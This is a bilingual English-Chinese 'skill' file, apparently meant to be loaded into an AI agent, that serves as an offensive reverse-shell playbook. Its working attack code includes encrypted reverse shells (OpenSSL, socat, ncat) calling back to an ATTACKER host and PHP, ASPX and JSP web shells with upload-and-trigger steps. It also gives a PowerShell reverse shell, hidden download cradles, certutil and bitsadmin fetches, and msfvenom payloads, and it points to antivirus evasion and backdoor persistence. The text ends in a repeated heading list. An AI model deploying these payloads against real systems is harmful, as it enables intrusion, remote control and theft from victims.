SKILL: Reverse Shell Techniques — Expert Attack Playbook

技能：反向Shell技术——高级攻击手册

AI LOAD INSTRUCTION: Expert reverse shell techniques. Covers reverse/bind shell decisions, encrypted shells (OpenSSL, socat SSL, ncat), web shell patterns (PHP/ASPX/JSP), PTY upgrade sequences, file transfer methods, PowerShell download cradles, and msfvenom payload generation. Base models miss encrypted shell syntax, proper PTY stabilization, and platform-specific transfer techniques.

AI加载说明：高级反向Shell技术，涵盖反向/绑定Shell选型、加密Shell（OpenSSL、socat SSL、ncat）、Web Shell模板（PHP/ASPX/JSP）、PTY升级步骤、文件传输方法、PowerShell下载加载器、msfvenom payload生成。基础模型缺少加密Shell语法、正确的PTY稳定方案以及平台专属的传输技巧。

0. RELATED ROUTING

0. 关联技能路径

Before going deep, consider loading:

tunneling-and-pivoting after shell access for network pivoting
linux-privilege-escalation or windows-privilege-escalation after landing shell
windows-av-evasion when AV blocks shell payloads

深入学习前，可考虑加载以下技能：

获取Shell访问权限后加载隧道与内网穿透进行内网横向移动
拿到Shell后加载 Linux权限提升或 Windows权限提升
当杀毒软件拦截Shell payload时加载 Windows杀毒软件绕过

Quick Reference

快速参考

Also load SHELL_CHEATSHEET.md when you need:

Complete one-liner reverse shells for 20+ languages
Copy-paste ready payloads with placeholder substitution

当你需要以下内容时也可以加载 SHELL_CHEATSHEET.md：

覆盖20+种语言的完整单行反向Shell命令
支持占位符替换、可直接复制粘贴的payload

1. REVERSE vs BIND SHELL DECISION

1. 反向Shell vs 绑定Shell选型

Factor	Reverse Shell	Bind Shell
Firewall (egress)	Works if outbound allowed	Blocked by egress filtering
Firewall (ingress)	Not blocked	Requires inbound access to victim
NAT	Works (victim connects out)	Fails (can't reach victim behind NAT)
Detection	Outbound connection — less suspicious	Listening port — easily detected
Default choice	Almost always preferred	Only when no egress + have inbound

对比项	反向Shell	绑定Shell
防火墙（出站）	只要允许出站即可使用	会被出站过滤规则拦截
防火墙（入站）	不受入站规则拦截	需要能访问受害者的入站端口
NAT环境	可用（受害者主动外连）	不可用（无法访问NAT后的受害者）
检测风险	出站连接——更不容易被怀疑	监听端口——极易被检测到
默认选择	几乎是首选方案	仅当无出站权限且具备入站访问权限时使用

2. ENCRYPTED SHELLS

2. 加密Shell

OpenSSL Reverse Shell

OpenSSL反向Shell

bash

undefined

bash

undefined

Attacker: generate cert + listen

攻击端：生成证书 + 监听端口

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost' openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

Victim:

受害者端：

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:4444 > /tmp/s; rm /tmp/s

undefined

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER:4444 > /tmp/s; rm /tmp/s

undefined

Socat Encrypted Shell

Socat加密Shell

bash

undefined

bash

undefined

Attacker: generate cert + listen

攻击端：生成证书 + 监听端口

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 30 -out shell.crt cat shell.key shell.crt > shell.pem socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork STDOUT

Victim:

受害者端：

socat OPENSSL:ATTACKER:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane

undefined

socat OPENSSL:ATTACKER:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane

undefined

Ncat SSL

bash

undefined

bash

undefined

Attacker:

攻击端：

ncat --ssl -lvnp 4444

Victim:

受害者端：

ncat --ssl ATTACKER 4444 -e /bin/bash

---

ncat --ssl ATTACKER 4444 -e /bin/bash

---

3. WEB SHELLS

3. Web Shell

PHP

php

<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

<!-- Minimal stealth shell -->
<?=`$_GET[0]`?>

<!-- POST-based with password -->
<?php if($_POST['k']==='SECRET'){system($_POST['cmd']);} ?>

php

<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

<!-- 极简隐匿Shell -->
<?=`$_GET[0]`?>

<!-- 带密码的POST请求型Shell -->
<?php if($_POST['k']==='SECRET'){system($_POST['cmd']);} ?>

ASPX

aspx

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<% Process.Start(new ProcessStartInfo("cmd.exe","/c "+Request["cmd"]){UseShellExecute=false,RedirectStandardOutput=true}).StandardOutput.ReadToEnd(); %>

aspx

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<% Process.Start(new ProcessStartInfo("cmd.exe","/c "+Request["cmd"]){UseShellExecute=false,RedirectStandardOutput=true}).StandardOutput.ReadToEnd(); %>

JSP

jsp

<%@ page import="java.io.*" %>
<% Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
String l;while((l=br.readLine())!=null){out.println(l);} %>

jsp

<%@ page import="java.io.*" %>
<% Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
String l;while((l=br.readLine())!=null){out.println(l);} %>

Upload + Trigger Patterns

上传+触发流程

1. Find upload endpoint → upload shell with allowed extension bypass
2. Locate uploaded file (predictable path, directory listing, response leak)
3. Trigger: GET /uploads/shell.php?cmd=id
4. Upgrade to reverse shell: ?cmd=bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

1. 找到上传端点 → 绕过扩展名限制上传Shell
2. 定位上传文件位置（通过 predictable路径、目录遍历、响应泄露）
3. 触发：GET /uploads/shell.php?cmd=id
4. 升级为反向Shell：?cmd=bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

4. PTY UPGRADE SEQUENCE

4. PTY升级步骤

Standard Python Upgrade

标准Python升级方案

bash

undefined

bash

undefined

Step 1: Spawn PTY

步骤1：生成PTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

Step 2: Background shell

步骤2：将Shell放到后台

Press Ctrl+Z

按下 Ctrl+Z

Step 3: Configure terminal (on attacker)

步骤3：（攻击端）配置终端

stty raw -echo; fg

Step 4: Set environment (back in shell)

步骤4：（回到Shell中）设置环境变量

export TERM=xterm-256color stty rows 40 cols 160

undefined

export TERM=xterm-256color stty rows 40 cols 160

undefined

Alternative Upgrades

替代升级方案

bash

undefined

bash

undefined

script command

script命令方案

script /dev/null -c bash

socat full PTY (requires socat on victim)

socat全功能PTY（受害者端需要安装socat）

Attacker:

攻击端：

socat file:

tty

,raw,echo=0 tcp-listen:4444

socat file:

tty

,raw,echo=0 tcp-listen:4444

Victim:

受害者端：

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444

rlwrap for readline support (attacker side)

攻击端使用rlwrap获取readline支持

rlwrap nc -lvnp 4444

expect

expect方案

/usr/bin/expect -c 'spawn bash; interact'

---

/usr/bin/expect -c 'spawn bash; interact'

---

5. FILE TRANSFER METHODS

5. 文件传输方法

Linux

bash

undefined

bash

undefined

wget / curl

wget / curl方案

wget http://ATTACKER:8000/file -O /tmp/file curl http://ATTACKER:8000/file -o /tmp/file

Python HTTP server (attacker side)

攻击端启动Python HTTP服务

python3 -m http.server 8000

nc file transfer

nc文件传输

Receiver:

接收端：

nc -lvnp 9999 > file

Sender:

发送端：

nc RECEIVER 9999 < file

base64 encode/decode (no tools needed)

base64编解码（无需额外工具）

Encode on source:

源端编码：

base64 -w0 file

Paste on target:

目标端粘贴解码：

echo "BASE64_STRING" | base64 -d > file

scp through pivot

通过跳板机使用scp传输

scp -o ProxyJump=pivot user@target:/path/file ./local

undefined

scp -o ProxyJump=pivot user@target:/path/file ./local

undefined

Windows

powershell

undefined

powershell

undefined

PowerShell DownloadFile

PowerShell DownloadFile方案

(New-Object Net.WebClient).DownloadFile('http://ATTACKER/file','C:\temp\file')

PowerShell Invoke-WebRequest (PS 3.0+)

PowerShell Invoke-WebRequest（PS 3.0及以上版本支持）

Invoke-WebRequest -Uri http://ATTACKER/file -OutFile C:\temp\file iwr http://ATTACKER/file -o C:\temp\file

certutil

certutil方案

certutil -urlcache -f http://ATTACKER/file C:\temp\file

bitsadmin

bitsadmin方案

bitsadmin /transfer job /download /priority high http://ATTACKER/file C:\temp\file

SMB share (attacker hosts)

SMB共享（攻击端搭建共享）

Attacker: impacket-smbserver share /tmp/share -smb2support

攻击端命令：impacket-smbserver share /tmp/share -smb2support

copy \ATTACKER\share\file C:\temp\file

---

copy \ATTACKER\share\file C:\temp\file

---

6. POWERSHELL REVERSE SHELLS

6. PowerShell反向Shell

powershell

undefined

powershell

undefined

One-liner TCP reverse shell

单行TCP反向Shell

$c=New-Object Net.Sockets.TCPClient('ATTACKER',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()

Download cradle + execute

下载加载器+执行

powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Base64 encoded execution

Base64编码执行

$cmd = '...reverse shell code...' $bytes = [Text.Encoding]::Unicode.GetBytes($cmd) $encoded = [Convert]::ToBase64String($bytes) powershell -ep bypass -enc $encoded

---

$cmd = '...reverse shell code...' $bytes = [Text.Encoding]::Unicode.GetBytes($cmd) $encoded = [Convert]::ToBase64String($bytes) powershell -ep bypass -enc $encoded

---

7. MSFVENOM PAYLOADS

7. MSFVENOM Payload

bash

undefined

bash

undefined

Linux reverse shell (ELF)

Linux反向Shell（ELF格式）

msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell

Windows reverse shell (EXE)

Windows反向Shell（EXE格式）

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe

Meterpreter (staged)

Meterpreter（分阶段payload）

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o meter.exe

Web payloads

Web payload

msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw > shell.jsp msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f aspx -o shell.aspx

DLL / HTA / VBS

DLL / HTA / VBS格式

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o evil.dll msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o evil.hta msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f vbs -o evil.vbs

---

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o evil.dll msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o evil.hta msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f vbs -o evil.vbs

---

8. DECISION TREE

8. 决策树

Need remote shell on target
│
├── Can execute commands already (RCE)?
│   ├── Linux target?
│   │   ├── bash/python/perl available? → one-liner reverse shell (CHEATSHEET.md)
│   │   ├── Need encryption? → OpenSSL or socat SSL shell (§2)
│   │   └── Outbound blocked? → bind shell or tunnel (see tunneling-and-pivoting)
│   │
│   ├── Windows target?
│   │   ├── PowerShell available? → PS reverse shell (§6)
│   │   ├── Need binary? → msfvenom payload (§7)
│   │   └── AV blocking? → load windows-av-evasion skill
│   │
│   └── Web server (upload possible)?
│       ├── PHP? → PHP web shell (§3) → upgrade to reverse shell
│       ├── ASP.NET? → ASPX shell (§3)
│       └── Java/Tomcat? → JSP shell (§3)
│
├── Got a dumb shell?
│   ├── Python available? → PTY upgrade (§4)
│   ├── script available? → script /dev/null -c bash (§4)
│   ├── socat on target? → socat full PTY (§4)
│   └── None? → rlwrap on attacker side for readline
│
├── Need to transfer tools?
│   ├── Linux: wget/curl/nc/base64 (§5)
│   ├── Windows: certutil/PowerShell/bitsadmin/SMB (§5)
│   └── No outbound? → base64 copy-paste (§5)
│
└── Shell established — next steps?
    ├── Privilege escalation → load linux/windows-privilege-escalation
    ├── Pivot to internal network → load tunneling-and-pivoting
    └── Persistence → implant backdoor

需要在目标上获取远程Shell
│
├── 已经可以执行命令（存在RCE）？
│   ├── 目标是Linux系统？
│   │   ├── 可用bash/python/perl？ → 单行反向Shell（参考CHEATSHEET.md）
│   │   ├── 需要加密传输？ → OpenSSL或socat SSL Shell（见第2节）
│   │   └── 出站被拦截？ → 绑定Shell或隧道（参考隧道与内网穿透技能）
│   │
│   ├── 目标是Windows系统？
│   │   ├── 可用PowerShell？ → PowerShell反向Shell（见第6节）
│   │   ├── 需要二进制文件？ → msfvenom payload（见第7节）
│   │   └── 杀毒软件拦截？ → 加载Windows杀毒软件绕过技能
│   │
│   └── 是Web服务器且支持上传？
│       ├── 支持PHP？ → PHP Web Shell（见第3节）→ 升级为反向Shell
│       ├── 支持ASP.NET？ → ASPX Shell（见第3节）
│       └── 支持Java/Tomcat？ → JSP Shell（见第3节）
│
├── 拿到了无交互哑Shell？
│   ├── 可用Python？ → PTY升级（见第4节）
│   ├── 可用script命令？ → script /dev/null -c bash（见第4节）
│   ├── 目标端有socat？ → socat全功能PTY（见第4节）
│   └── 以上都没有？ → 攻击端使用rlwrap获取readline支持
│
├── 需要传输工具？
│   ├── Linux：wget/curl/nc/base64（见第5节）
│   ├── Windows：certutil/PowerShell/bitsadmin/SMB（见第5节）
│   └── 无出站权限？ → base64复制粘贴传输（见第5节）
│
└── 已建立Shell —— 后续步骤？
    ├── 权限提升 → 加载Linux/Windows权限提升技能
    ├── 横向移动到内网 → 加载隧道与内网穿透技能
    └── 持久化 → 植入后门

reverse-shell-techniques

Original

Translation

SKILL: Reverse Shell Techniques — Expert Attack Playbook

技能：反向Shell技术——高级攻击手册

0. RELATED ROUTING

0. 关联技能路径

Quick Reference

快速参考

1. REVERSE vs BIND SHELL DECISION

1. 反向Shell vs 绑定Shell选型

2. ENCRYPTED SHELLS

2. 加密Shell

OpenSSL Reverse Shell

OpenSSL反向Shell

Attacker: generate cert + listen

攻击端：生成证书 + 监听端口

Victim:

受害者端：

Socat Encrypted Shell

Socat加密Shell

Attacker: generate cert + listen

攻击端：生成证书 + 监听端口

Victim:

受害者端：

Ncat SSL

Ncat SSL

Attacker:

攻击端：

Victim:

受害者端：

3. WEB SHELLS

3. Web Shell

PHP

PHP

ASPX

ASPX

JSP

JSP

Upload + Trigger Patterns

上传+触发流程

4. PTY UPGRADE SEQUENCE

4. PTY升级步骤

Standard Python Upgrade

标准Python升级方案

Step 1: Spawn PTY

步骤1：生成PTY

Step 2: Background shell

步骤2：将Shell放到后台

Press Ctrl+Z

按下 Ctrl+Z

Step 3: Configure terminal (on attacker)

步骤3：（攻击端）配置终端

Step 4: Set environment (back in shell)

步骤4：（回到Shell中）设置环境变量

Alternative Upgrades

替代升级方案

script command

script命令方案

socat full PTY (requires socat on victim)

socat全功能PTY（受害者端需要安装socat）

Attacker:

攻击端：

Victim:

受害者端：

rlwrap for readline support (attacker side)

攻击端使用rlwrap获取readline支持

expect

expect方案

5. FILE TRANSFER METHODS

5. 文件传输方法

Linux

Linux

wget / curl

wget / curl方案

Python HTTP server (attacker side)

攻击端启动Python HTTP服务

nc file transfer

nc文件传输

Receiver: